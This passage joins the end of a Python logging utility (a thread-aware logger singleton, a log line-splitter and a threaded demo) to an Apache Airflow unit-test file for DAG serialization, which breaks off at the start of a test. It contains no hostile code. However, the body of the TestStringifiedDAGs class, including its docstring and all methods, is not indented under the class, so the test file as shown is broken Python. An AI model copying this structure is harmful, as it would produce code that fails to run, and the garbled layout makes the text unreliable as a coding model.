        """Create and register a logger for *name* if not already present."""
        if name not in self._loggers:
            new_logger = logging.getLogger(name)
            new_logger.setLevel(self._log_level)
            if self._log_path:
                # log path will vary if log by thread is enabled
                log_path = self.get_log_file_name()
                new_logger.addHandler(HandlerFactory.get_rotating_file_handler(
                    log_path, self._log_file_max_bytes, self._log_file_backup_count))
            self._loggers[name] = new_logger

    def set_log_path(self, file_path, max_bytes=0, backup_count=0):
        """Configure the log file path and rotation parameters.

        Silently ignores arguments of the wrong type.
        """
        if isinstance(file_path, str):
            self._log_path = file_path
        if isinstance(max_bytes, int):
            self._log_file_max_bytes = max_bytes
        if isinstance(backup_count, int):
            self._log_file_backup_count = backup_count

    def set_log_level(self, new_level):
        """Apply *new_level* to all existing loggers and future ones."""
        self._log_level = new_level
        for instanceLogger in self._loggers.values():
            instanceLogger.setLevel(self._log_level)

    def set_log_by_thread_log(self, log_by_thread):
        """Toggle per-thread logging; enables/disables existing loggers
        so only the appropriate set stays active."""
        self._log_by_thread = log_by_thread
        # if thread log is enabled, only enable the main logger
        for instanceLogger in self._loggers.values():
            instanceLogger.disabled = not self._log_by_thread
        try:
            self._loggers[self._main_thread_id].disabled = self._log_by_thread
        except KeyError:
            pass
class LogPostProcess():
    """Post-processing helpers for raw log byte streams."""

    def log_joint_and_decode(self, threadid, waiting_to_send, logdata, encodingtype):
        """Split buffered log bytes into complete lines.

        Joins the residue left from the previous call with the newly
        decoded ``logdata`` and cuts the result at every ``\\r\\n`` (or
        ``\\r\\r\\n``) terminator.  Complete lines go into
        ``waiting_to_send[threadid]["senddata"]``; trailing text without a
        terminator becomes the new residue.

        Args:
            threadid: key into ``waiting_to_send`` identifying the stream.
            waiting_to_send: per-thread dict holding "residue" (str) and
                "senddata" (list of completed lines; rebuilt each call).
            logdata: raw bytes to process.
            encodingtype: codec used to decode ``logdata``.

        Returns:
            The updated ``waiting_to_send`` mapping (mutated in place).
        """
        data = waiting_to_send[threadid]["residue"] + logdata.decode(encodingtype)
        waiting_to_send[threadid]["senddata"] = []
        new_data = ''
        pending_cr = 0  # consecutive '\r' characters seen before a '\n'
        for ch in data:
            if ch == '\r':
                pending_cr += 1
                continue
            if ch == '\n' and pending_cr > 0:
                # Terminator found: emit the accumulated line.
                waiting_to_send[threadid]["senddata"].append(new_data)
                pending_cr = 0
                new_data = ""
                continue
            # A bare '\n' (no preceding '\r') is treated as ordinary data.
            pending_cr = 0
            new_data += ch
        # Bug fix: the old residue was already consumed into ``data`` above,
        # so the leftover must REPLACE the stored residue rather than be
        # appended to it (appending duplicated data on every call), and an
        # empty leftover must clear any stale residue.
        waiting_to_send[threadid]["residue"] = new_data
        return waiting_to_send
if __name__ == '__main__':
    # Demo: the main thread and two worker threads each direct the shared
    # singleton at their own log file before logging at every level.

    def worker1(message):
        # Each thread may repoint the singleton's log path for itself.
        GeneralLogger().set_log_path('/tmp/thread1/test.txt')
        worker_logger = GeneralLogger().get_logger()
        worker_logger.info(message + ' info')
        worker_logger.debug(message + ' debug')
        worker_logger.warning(message + ' warning')
        worker_logger.error(message + ' error')

    def worker2(message):
        GeneralLogger().set_log_path('/tmp/thread2/test.txt')
        worker_logger = GeneralLogger().get_logger()
        worker_logger.info(message + ' info')
        worker_logger.debug(message + ' debug')
        worker_logger.warning(message + ' warning')
        worker_logger.error(message + ' error')

    GeneralLogger().set_log_path('/tmp/test.txt')
    GeneralLogger().set_log_by_thread_log(True)
    GeneralLogger().set_log_level(LOG_LEVEL_DEBUG)
    main_logger = GeneralLogger().get_logger()
    main_logger.debug('debug')
    main_logger.warning('warning')
    main_logger.info('info')
    main_logger.error('error')
    t1 = threading.Thread(target=worker1, args=('worker 1',))
    t2 = threading.Thread(target=worker2, args=('worker 2',))
    t1.start()
    t2.start()
test_dag_serialization.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import copy
import importlib
import importlib.util
import multiprocessing
import os
from datetime import datetime, timedelta
from glob import glob
from unittest import mock
import pendulum
import pytest
from dateutil.relativedelta import FR, relativedelta
from kubernetes.client import models as k8s
from airflow.exceptions import SerializationError
from airflow.hooks.base import BaseHook
from airflow.kubernetes.pod_generator import PodGenerator
from airflow.models import DAG, Connection, DagBag
from airflow.models.baseoperator import BaseOperator, BaseOperatorLink
from airflow.models.param import Param, ParamsDict
from airflow.models.xcom import XCom
from airflow.operators.bash import BashOperator
from airflow.security import permissions
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from airflow.timetables.simple import NullTimetable, OnceTimetable
from airflow.utils import timezone
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
from tests.test_utils.timetables import CustomSerializationTimetable, cron_timetable, delta_timetable
# Kubernetes pod used as the executor_config "pod_override" ground truth
# in the serialization tests below.
executor_config_pod = k8s.V1Pod(
    metadata=k8s.V1ObjectMeta(name="my-name"),
    spec=k8s.V1PodSpec(
        containers=[
            k8s.V1Container(name="base", volume_mounts=[k8s.V1VolumeMount(name="my-vol", mount_path="/vol/")])
        ]
    ),
)
# Exact expected serialized form of the DAG built by make_simple_dag();
# test_serialization() compares against this byte-for-byte (after sorting).
serialized_simple_dag_ground_truth = {
    "__version": 1,
    "dag": {
        "default_args": {
            "__type": "dict",
            "__var": {
                "depends_on_past": False,
                "retries": 1,
                "retry_delay": {"__type": "timedelta", "__var": 300.0},
                "max_retry_delay": {"__type": "timedelta", "__var": 600.0},
                "sla": {"__type": "timedelta", "__var": 100.0},
            },
        },
        "start_date": 1564617600.0,
        '_task_group': {
            '_group_id': None,
            'prefix_group_id': True,
            'children': {'bash_task': ('operator', 'bash_task'), 'custom_task': ('operator', 'custom_task')},
            'tooltip': '',
            'ui_color': 'CornflowerBlue',
            'ui_fgcolor': '#000',
            'upstream_group_ids': [],
            'downstream_group_ids': [],
            'upstream_task_ids': [],
            'downstream_task_ids': [],
        },
        "is_paused_upon_creation": False,
        "_dag_id": "simple_dag",
        "doc_md": "### DAG Tutorial Documentation",
        "fileloc": None,
        "tasks": [
            {
                "task_id": "bash_task",
                "owner": "airflow",
                "retries": 1,
                "retry_delay": 300.0,
                "max_retry_delay": 600.0,
                "sla": 100.0,
                "_downstream_task_ids": [],
                "_inlets": [],
                "_is_dummy": False,
                "_outlets": [],
                "ui_color": "#f0ede4",
                "ui_fgcolor": "#000",
                "template_ext": ['.sh', '.bash'],
                "template_fields": ['bash_command', 'env'],
                "template_fields_renderers": {'bash_command': 'bash', 'env': 'json'},
                "bash_command": "echo {{ task.task_id }}",
                'label': 'bash_task',
                "_task_type": "BashOperator",
                "_task_module": "airflow.operators.bash",
                "pool": "default_pool",
                "executor_config": {
                    '__type': 'dict',
                    '__var': {
                        "pod_override": {
                            '__type': 'k8s.V1Pod',
                            '__var': PodGenerator.serialize_pod(executor_config_pod),
                        }
                    },
                },
                "doc_md": "### Task Tutorial Documentation",
            },
            {
                "task_id": "custom_task",
                "retries": 1,
                "retry_delay": 300.0,
                "max_retry_delay": 600.0,
                "sla": 100.0,
                "_downstream_task_ids": [],
                "_inlets": [],
                "_is_dummy": False,
                "_outlets": [],
                "_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
                "ui_color": "#fff",
                "ui_fgcolor": "#000",
                "template_ext": [],
                "template_fields": ['bash_command'],
                "template_fields_renderers": {},
                "_task_type": "CustomOperator",
                "_task_module": "tests.test_utils.mock_operators",
                "pool": "default_pool",
                'label': 'custom_task',
            },
        ],
        "schedule_interval": {"__type": "timedelta", "__var": 86400.0},
        "timezone": "UTC",
        "_access_control": {
            "__type": "dict",
            "__var": {
                "test_role": {
                    "__type": "set",
                    "__var": [permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT],
                }
            },
        },
        "edge_info": {},
        "dag_dependencies": [],
        "params": {},
    },
}
# Repository root (two levels above this test file).
ROOT_FOLDER = os.path.realpath(
    os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
# Serialized form of CustomSerializationTimetable("foo"), reused by several tests.
CUSTOM_TIMETABLE_SERIALIZED = {
    "__type": "tests.test_utils.timetables.CustomSerializationTimetable",
    "__var": {"value": "foo"},
}
def make_example_dags(module_path):
    """Load and return the DAGs found under *module_path* for testing."""
    return DagBag(module_path).dags
def make_simple_dag():
    """Make very simple DAG to verify serialization result.

    Must stay in sync with ``serialized_simple_dag_ground_truth`` above.
    """
    with DAG(
        dag_id='simple_dag',
        default_args={
            "retries": 1,
            "retry_delay": timedelta(minutes=5),
            "max_retry_delay": timedelta(minutes=10),
            "depends_on_past": False,
            "sla": timedelta(seconds=100),
        },
        start_date=datetime(2019, 8, 1),
        is_paused_upon_creation=False,
        access_control={"test_role": {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT}},
        doc_md="### DAG Tutorial Documentation",
    ) as dag:
        CustomOperator(task_id='custom_task')
        BashOperator(
            task_id='bash_task',
            bash_command='echo {{ task.task_id }}',
            owner='airflow',
            executor_config={"pod_override": executor_config_pod},
            doc_md="### Task Tutorial Documentation",
        )
        return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
    """Make DAGs with user defined macros and filters using locally defined methods.

    For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.

    The examples here test:
        (1) functions can be successfully displayed on UI;
        (2) templates with function macros have been rendered before serialization.
    """

    def compute_next_execution_date(dag, execution_date):
        # Locally defined macro — exercises serialization of callables.
        return dag.following_schedule(execution_date)

    default_args = {'start_date': datetime(2019, 7, 10)}
    dag = DAG(
        'user_defined_macro_filter_dag',
        default_args=default_args,
        user_defined_macros={
            'next_execution_date': compute_next_execution_date,
        },
        user_defined_filters={'hello': lambda name: f'Hello {name}'},
        catchup=False,
    )
    BashOperator(
        task_id='echo',
        bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
        dag=dag,
    )
    return {dag.dag_id: dag}
def collect_dags(dag_folder=None):
    """Collects DAGs to test.

    Always includes the two locally built DAGs, plus every example DAG
    found under *dag_folder* (string, or list/tuple of glob patterns);
    defaults to the Airflow core and provider example folders.
    """
    dags = {}
    dags.update(make_simple_dag())
    dags.update(make_user_defined_macro_filter_dag())
    if not dag_folder:
        patterns = [
            "airflow/example_dags",
            "airflow/providers/*/example_dags",
            "airflow/providers/*/*/example_dags",
        ]
    elif isinstance(dag_folder, (list, tuple)):
        patterns = list(dag_folder)
    else:
        patterns = [dag_folder]
    for pattern in patterns:
        for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
            dags.update(make_example_dags(directory))
    # Subdags are stored in the same row of the Serialized Dag table as
    # their parent, so they are filtered out here.
    return {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
def get_timetable_based_simple_dag(timetable):
    """Create a simple_dag variant that uses timetable instead of schedule_interval."""
    dag = collect_dags(["airflow/example_dags"])["simple_dag"]
    dag.timetable = timetable
    # Keep schedule_interval textually consistent with the new timetable.
    dag.schedule_interval = timetable.summary
    return dag
def serialize_subprocess(queue, dag_folder):
    """Validate pickle in a subprocess.

    Serializes every collected DAG to JSON and pushes the strings onto
    *queue*, terminated by a None sentinel.
    """
    dags = collect_dags(dag_folder)
    for dag in dags.values():
        queue.put(SerializedDAG.to_json(dag))
    queue.put(None)
@pytest.fixture()
def timetable_plugin(monkeypatch):
    """Patch plugins manager to always and only return our custom timetable."""
    from airflow import plugins_manager

    # Prevent the real plugin discovery from overwriting our registration.
    monkeypatch.setattr(plugins_manager, "initialize_timetables_plugins", lambda: None)
    monkeypatch.setattr(
        plugins_manager,
        "timetable_classes",
        {"tests.test_utils.timetables.CustomSerializationTimetable": CustomSerializationTimetable},
    )
class TestStringifiedDAGs:
"""Unit tests for stringified DAGs."""
def setup_method(self):
    """Stub BaseHook.get_connection so no real connection lookup happens."""
    self.backup_base_hook_get_connection = BaseHook.get_connection
    BaseHook.get_connection = mock.Mock(
        return_value=Connection(
            extra=(
                '{'
                '"project_id": "mock", '
                '"location": "mock", '
                '"instance": "mock", '
                '"database_type": "postgres", '
                '"use_proxy": "False", '
                '"use_ssl": "False"'
                '}'
            )
        )
    )
    self.maxDiff = None
def teardown_method(self):
    """Restore the real BaseHook.get_connection patched in setup_method."""
    BaseHook.get_connection = self.backup_base_hook_get_connection
def test_serialization(self):
    """Serialization and deserialization should work for every DAG and Operator."""
    dags = collect_dags()
    serialized_dags = {}
    for _, v in dags.items():
        dag = SerializedDAG.to_dict(v)
        SerializedDAG.validate_schema(dag)
        serialized_dags[v.dag_id] = dag
    # Compares with the ground truth of JSON string.
    self.validate_serialized_dag(serialized_dags['simple_dag'], serialized_simple_dag_ground_truth)
@pytest.mark.parametrize(
    "timetable, serialized_timetable",
    [
        (
            cron_timetable("0 0 * * *"),
            {
                "__type": "airflow.timetables.interval.CronDataIntervalTimetable",
                "__var": {"expression": "0 0 * * *", "timezone": "UTC"},
            },
        ),
        (
            CustomSerializationTimetable("foo"),
            CUSTOM_TIMETABLE_SERIALIZED,
        ),
    ],
)
@pytest.mark.usefixtures("timetable_plugin")
def test_dag_serialization_to_timetable(self, timetable, serialized_timetable):
    """Verify a timetable-backed schedule_interval is excluded in serialization."""
    dag = get_timetable_based_simple_dag(timetable)
    serialized_dag = SerializedDAG.to_dict(dag)
    SerializedDAG.validate_schema(serialized_dag)
    # The ground truth, with schedule_interval replaced by the timetable.
    expected = copy.deepcopy(serialized_simple_dag_ground_truth)
    del expected["dag"]["schedule_interval"]
    expected["dag"]["timetable"] = serialized_timetable
    self.validate_serialized_dag(serialized_dag, expected)
def test_dag_serialization_unregistered_custom_timetable(self):
    """Verify serialization fails without timetable registration."""
    # Note: no timetable_plugin fixture here, so the class is unregistered.
    dag = get_timetable_based_simple_dag(CustomSerializationTimetable("bar"))
    with pytest.raises(SerializationError) as ctx:
        SerializedDAG.to_dict(dag)
    message = (
        "Failed to serialize DAG 'simple_dag': Timetable class "
        "'tests.test_utils.timetables.CustomSerializationTimetable' "
        "is not registered"
    )
    assert str(ctx.value) == message
def validate_serialized_dag(self, json_dag, ground_truth_dag):
    """Verify serialized DAGs match the ground truth."""
    # fileloc is machine-dependent; check the basename then blank it out.
    assert json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py'
    json_dag['dag']['fileloc'] = None

    def sorted_serialized_dag(dag_dict: dict):
        """
        Sorts the "tasks" list and "access_control" permissions in the
        serialised dag python dictionary. This is needed as the order of
        items should not matter but assertEqual would fail if the order of
        items changes in the dag dictionary
        """
        dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"], key=lambda x: sorted(x.keys()))
        dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
            dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
        )
        return dag_dict

    assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
def test_deserialization_across_process(self):
    """A serialized DAG can be deserialized in another process."""
    # Since we need to parse the dags twice here (once in the subprocess,
    # and once here to get a DAG to compare to) we don't want to load all
    # dags.
    queue = multiprocessing.Queue()
    proc = multiprocessing.Process(target=serialize_subprocess, args=(queue, "airflow/example_dags"))
    proc.daemon = True
    proc.start()
    stringified_dags = {}
    # Drain the queue until the None sentinel from serialize_subprocess.
    while True:
        v = queue.get()
        if v is None:
            break
        dag = SerializedDAG.from_json(v)
        assert isinstance(dag, DAG)
        stringified_dags[dag.dag_id] = dag
    dags = collect_dags("airflow/example_dags")
    assert set(stringified_dags.keys()) == set(dags.keys())
    # Verify deserialized DAGs.
    for dag_id in stringified_dags:
        self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
    """Every provider example DAG survives a JSON round trip."""
    dags = collect_dags(
        [
            "airflow/providers/*/example_dags",
            "airflow/providers/*/*/example_dags",
        ]
    )
    # Verify deserialized DAGs.
    for dag in dags.values():
        serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
        self.validate_deserialized_dag(serialized_dag, dag)
@pytest.mark.parametrize(
    "timetable",
    [cron_timetable("0 0 * * *"), CustomSerializationTimetable("foo")],
)
@pytest.mark.usefixtures("timetable_plugin")
def test_dag_roundtrip_from_timetable(self, timetable):
    """Verify a timetable-backed serialization can be deserialized."""
    dag = get_timetable_based_simple_dag(timetable)
    roundtripped = SerializedDAG.from_json(SerializedDAG.to_json(dag))
    self.validate_deserialized_dag(roundtripped, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
    """
    Verify that all example DAGs work with DAG Serialization by
    checking fields between Serialized Dags & non-Serialized Dags
    """
    fields_to_check = dag.get_serialized_fields() - {
        # Doesn't implement __eq__ properly. Check manually.
        'timetable',
        'timezone',
        # Need to check fields in it, to exclude functions.
        'default_args',
        "_task_group",
        'params',
    }
    for field in fields_to_check:
        assert getattr(serialized_dag, field) == getattr(
            dag, field
        ), f'{dag.dag_id}.{field} does not match'
    if dag.default_args:
        for k, v in dag.default_args.items():
            if callable(v):
                # Check we stored _something_.
                assert k in serialized_dag.default_args
            else:
                assert (
                    v == serialized_dag.default_args[k]
                ), f'{dag.dag_id}.default_args[{k}] does not match'
    # Manual equality checks for the excluded fields above.
    assert serialized_dag.timetable.summary == dag.timetable.summary
    assert serialized_dag.timetable.serialize() == dag.timetable.serialize()
    assert serialized_dag.timezone.name == dag.timezone.name
    for task_id in dag.task_ids:
        self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
def validate_deserialized_task(
    self,
    serialized_task,
    task,
):
    """Verify non-airflow operators are casted to BaseOperator."""
    assert isinstance(serialized_task, SerializedBaseOperator)
    assert not isinstance(task, SerializedBaseOperator)
    assert isinstance(task, BaseOperator)
    fields_to_check = task.get_serialized_fields() - {
        # Checked separately
        '_task_type',
        'subdag',
        # Type is excluded, so don't check it
        '_log',
        # List vs tuple. Check separately
        'template_ext',
        'template_fields',
        # We store the string, real dag has the actual code
        'on_failure_callback',
        'on_success_callback',
        'on_retry_callback',
        # Checked separately
        'resources',
        'params',
    }
    assert serialized_task.task_type == task.task_type
    # Compare as sets: serialization may return tuples instead of lists.
    assert set(serialized_task.template_ext) == set(task.template_ext)
    assert set(serialized_task.template_fields) == set(task.template_fields)
    assert serialized_task.upstream_task_ids == task.upstream_task_ids
    assert serialized_task.downstream_task_ids == task.downstream_task_ids
    for field in fields_to_check:
        assert getattr(serialized_task, field) == getattr(
            task, field
        ), f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
    if serialized_task.resources is None:
        assert task.resources is None or task.resources == []
    else:
        assert serialized_task.resources == task.resources
    # Ugly hack as some operators override params var in their init
    if isinstance(task.params, ParamsDict):
        assert serialized_task.params.dump() == task.params.dump()
    # Check that for Deserialised task, task.subdag is None for all other Operators
    # except for the SubDagOperator where task.subdag is an instance of DAG object
    if task.task_type == "SubDagOperator":
        assert serialized_task.subdag is not None
        assert isinstance(serialized_task.subdag, DAG)
    else:
        assert serialized_task.subdag is None
@pytest.mark.parametrize(
    "dag_start_date, task_start_date, expected_task_start_date",
    [
        (datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
        (
            datetime(2019, 8, 1, tzinfo=timezone.utc),
            datetime(2019, 8, 2, tzinfo=timezone.utc),
            datetime(2019, 8, 2, tzinfo=timezone.utc),
        ),
        (
            datetime(2019, 8, 1, tzinfo=timezone.utc),
            datetime(2019, 7, 30, tzinfo=timezone.utc),
            datetime(2019, 8, 1, tzinfo=timezone.utc),
        ),
        (pendulum.datetime(2019, 8, 1, tz='UTC'), None, pendulum.datetime(2019, 8, 1, tz='UTC')),
    ],
)
def test_deserialization_start_date(self, dag_start_date, task_start_date, expected_task_start_date):
    """Task start_date is only serialized when later than the DAG's."""
    dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
    BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
    serialized_dag = SerializedDAG.to_dict(dag)
    if not task_start_date or dag_start_date >= task_start_date:
        # If dag.start_date > task.start_date -> task.start_date=dag.start_date
        # because of the logic in dag.add_task()
        assert "start_date" not in serialized_dag["dag"]["tasks"][0]
    else:
        assert "start_date" in serialized_dag["dag"]["tasks"][0]
    dag = SerializedDAG.from_dict(serialized_dag)
    simple_task = dag.task_dict["simple_task"]
    assert simple_task.start_date == expected_task_start_date
def test_deserialization_with_dag_context(self):
    """Serializing inside an active DAG context manager must be safe."""
    with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1, tzinfo=timezone.utc)) as dag:
        BaseOperator(task_id='simple_task')
        # should not raise RuntimeError: dictionary changed size during iteration
        SerializedDAG.to_dict(dag)
@pytest.mark.parametrize(
    "dag_end_date, task_end_date, expected_task_end_date",
    [
        (datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
        (
            datetime(2019, 8, 1, tzinfo=timezone.utc),
            datetime(2019, 8, 2, tzinfo=timezone.utc),
            datetime(2019, 8, 1, tzinfo=timezone.utc),
        ),
        (
            datetime(2019, 8, 1, tzinfo=timezone.utc),
            datetime(2019, 7, 30, tzinfo=timezone.utc),
            datetime(2019, 7, 30, tzinfo=timezone.utc),
        ),
    ],
)
def test_deserialization_end_date(self, dag_end_date, task_end_date, expected_task_end_date):
    """Task end_date is only serialized when earlier than the DAG's."""
    dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1), end_date=dag_end_date)
    BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
    serialized_dag = SerializedDAG.to_dict(dag)
    if not task_end_date or dag_end_date <= task_end_date:
        # If dag.end_date < task.end_date -> task.end_date=dag.end_date
        # because of the logic in dag.add_task()
        assert "end_date" not in serialized_dag["dag"]["tasks"][0]
    else:
        assert "end_date" in serialized_dag["dag"]["tasks"][0]
    dag = SerializedDAG.from_dict(serialized_dag)
    simple_task = dag.task_dict["simple_task"]
    assert simple_task.end_date == expected_task_end_date
@pytest.mark.parametrize(
    "serialized_timetable, expected_timetable",
    [
        ({"__type": "airflow.timetables.simple.NullTimetable", "__var": {}}, NullTimetable()),
        (
            {
                "__type": "airflow.timetables.interval.CronDataIntervalTimetable",
                "__var": {"expression": "@weekly", "timezone": "UTC"},
            },
            cron_timetable("0 0 * * 0"),
        ),
        ({"__type": "airflow.timetables.simple.OnceTimetable", "__var": {}}, OnceTimetable()),
        (
            {
                "__type": "airflow.timetables.interval.DeltaDataIntervalTimetable",
                "__var": {"delta": 86400.0},
            },
            delta_timetable(timedelta(days=1)),
        ),
        (CUSTOM_TIMETABLE_SERIALIZED, CustomSerializationTimetable("foo")),
    ],
)
@pytest.mark.usefixtures("timetable_plugin")
def test_deserialization_timetable(
    self,
    serialized_timetable,
    expected_timetable,
):
    """A hand-built serialized payload deserializes to the right timetable."""
    serialized = {
        "__version": 1,
        "dag": {
            "default_args": {"__type": "dict", "__var": {}},
            "_dag_id": "simple_dag",
            "fileloc": __file__,
            "tasks": [],
            "timezone": "UTC",
            "timetable": serialized_timetable,
        },
    }
    SerializedDAG.validate_schema(serialized)
    dag = SerializedDAG.from_dict(serialized)
    assert dag.timetable == expected_timetable
def test_deserialization_timetable_unregistered(self):
    """Deserializing an unregistered timetable raises a clear error."""
    serialized = {
        "__version": 1,
        "dag": {
            "default_args": {"__type": "dict", "__var": {}},
            "_dag_id": "simple_dag",
            "fileloc": __file__,
            "tasks": [],
            "timezone": "UTC",
            "timetable": CUSTOM_TIMETABLE_SERIALIZED,
        },
    }
    SerializedDAG.validate_schema(serialized)
    with pytest.raises(ValueError) as ctx:
        SerializedDAG.from_dict(serialized)
    message = (
        "Timetable class "
        "'tests.test_utils.timetables.CustomSerializationTimetable' "
        "is not registered"
    )
    assert str(ctx.value) == message
@pytest.mark.parametrize(
    "serialized_schedule_interval, expected_timetable",
    [
        (None, NullTimetable()),
        ("@weekly", cron_timetable("0 0 * * 0")),
        ("@once", OnceTimetable()),
        (
            {"__type": "timedelta", "__var": 86400.0},
            delta_timetable(timedelta(days=1)),
        ),
    ],
)
def test_deserialization_schedule_interval(
    self,
    serialized_schedule_interval,
    expected_timetable,
):
    """Test DAGs serialized before 2.2 can be correctly deserialized."""
    # Pre-2.2 payloads carry schedule_interval instead of a timetable.
    serialized = {
        "__version": 1,
        "dag": {
            "default_args": {"__type": "dict", "__var": {}},
            "_dag_id": "simple_dag",
            "fileloc": __file__,
            "tasks": [],
            "timezone": "UTC",
            "schedule_interval": serialized_schedule_interval,
        },
    }
    SerializedDAG.validate_schema(serialized)
    dag = SerializedDAG.from_dict(serialized)
    assert dag.timetable == expected_timetable
@pytest.mark.parametrize(
    "val, expected",
    [
        (relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
        (relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
        # Every friday
        (relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
        # Every second friday
        (relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}}),
    ],
)
def test_roundtrip_relativedelta(self, val, expected):
    """relativedelta values serialize to the documented form and round-trip."""
    serialized = SerializedDAG._serialize(val)
    assert serialized == expected
    round_tripped = SerializedDAG._deserialize(serialized)
    assert val == round_tripped
@pytest.mark.parametrize(
    "val, expected_val",
    [
        (None, {}),
        ({"param_1": "value_1"}, {"param_1": "value_1"}),
    ],
)
def test_dag_params_roundtrip(self, val, expected_val):
    """
    Test that params work both on Serialized DAGs & Tasks
    """
    dag = DAG(dag_id='simple_dag', params=val)
    BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
    serialized_dag = SerializedDAG.to_dict(dag)
    # DAG-level params are always serialized, even when empty.
    assert "params" in serialized_dag["dag"]
    deserialized_dag = SerializedDAG.from_dict(serialized_dag)
    deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
    assert expected_val == deserialized_dag.params.dump()
    assert expected_val == deserialized_simple_task.params.dump()
def test_invalid_params(self):
    """
    Test to make sure that only native Param objects are being passed as dag or task params
    """

    class S3Param(Param):
        # A Param subclass — deliberately not serializable.
        def __init__(self, path: str):
            schema = {"type": "string", "pattern": r"s3:\/\/(.+?)\/(.+)"}
            super().__init__(default=path, schema=schema)

    dag = DAG(dag_id='simple_dag', params={'path': S3Param('s3://my_bucket/my_path')})
    with pytest.raises(SerializationError):
        SerializedDAG.to_dict(dag)
    dag = DAG(dag_id='simple_dag')
    BaseOperator(
        task_id='simple_task',
        dag=dag,
        start_date=datetime(2019, 8, 1),
        params={'path': S3Param('s3://my_bucket/my_path')},
    )
    with pytest.raises(SerializationError):
        SerializedDAG.to_dict(dag)
@pytest.mark.parametrize(
    "val, expected_val",
    [
        (None, {}),
        ({"param_1": "value_1"}, {"param_1": "value_1"}),
    ],
)
def test_task_params_roundtrip(self, val, expected_val):
    """Task-level params are serialized only when set, and round-trip intact."""
    dag = DAG(dag_id='simple_dag')
    BaseOperator(task_id='simple_task', dag=dag, params=val, start_date=datetime(2019, 8, 1))

    blob = SerializedDAG.to_dict(dag)
    task_blob = blob["dag"]["tasks"][0]
    # Empty/None params are omitted from the serialized task entirely.
    if val:
        assert "params" in task_blob
    else:
        assert "params" not in task_blob

    restored_task = SerializedDAG.from_dict(blob).task_dict["simple_task"]
    assert restored_task.params.dump() == expected_val
def test_extra_serialized_field_and_operator_links(self):
    """
    Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
    This tests also depends on GoogleLink() registered as a plugin
    in tests/plugins/test_plugin.py
    The function tests that if extra operator links are registered in plugin
    in ``operator_extra_links`` and the same is also defined in
    the Operator in ``BaseOperator.operator_extra_links``, it has the correct
    extra link.
    """
    test_date = timezone.DateTime(2019, 8, 1, tzinfo=timezone.utc)
    dag = DAG(dag_id='simple_dag', start_date=test_date)
    CustomOperator(task_id='simple_task', dag=dag, bash_command="true")

    serialized_dag = SerializedDAG.to_dict(dag)
    # CustomOperator declares bash_command as an extra serialized field.
    assert "bash_command" in serialized_dag["dag"]["tasks"][0]

    dag = SerializedDAG.from_dict(serialized_dag)
    simple_task = dag.task_dict["simple_task"]
    # The extra field survives the round-trip with its original value.
    assert getattr(simple_task, "bash_command") == "true"

    #########################################################
    # Verify Operator Links work with Serialized Operator
    #########################################################
    # Check Serialized version of operator link only contains the inbuilt Op Link
    assert serialized_dag["dag"]["tasks"][0]["_operator_extra_links"] == [
        {'tests.test_utils.mock_operators.CustomOpLink': {}}
    ]

    # Test all the extra_links are set (inbuilt + plugin-registered ones)
    assert set(simple_task.extra_links) == {'Google Custom', 'airflow', 'github', 'google'}

    # The inbuilt link reads its target from XCom, so seed it first.
    XCom.set(
        key='search_query',
        value="dummy_value_1",
        task_id=simple_task.task_id,
        dag_id=simple_task.dag_id,
        execution_date=test_date,
    )

    # Test Deserialized inbuilt link
    custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
    assert 'http://google.com/custom_base_link?search=dummy_value_1' == custom_inbuilt_link

    # Test Deserialized link registered via Airflow Plugin
    google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
    assert "https://www.google.com" == google_link_from_plugin
def test_extra_operator_links_logs_error_for_non_registered_extra_links(self, caplog):
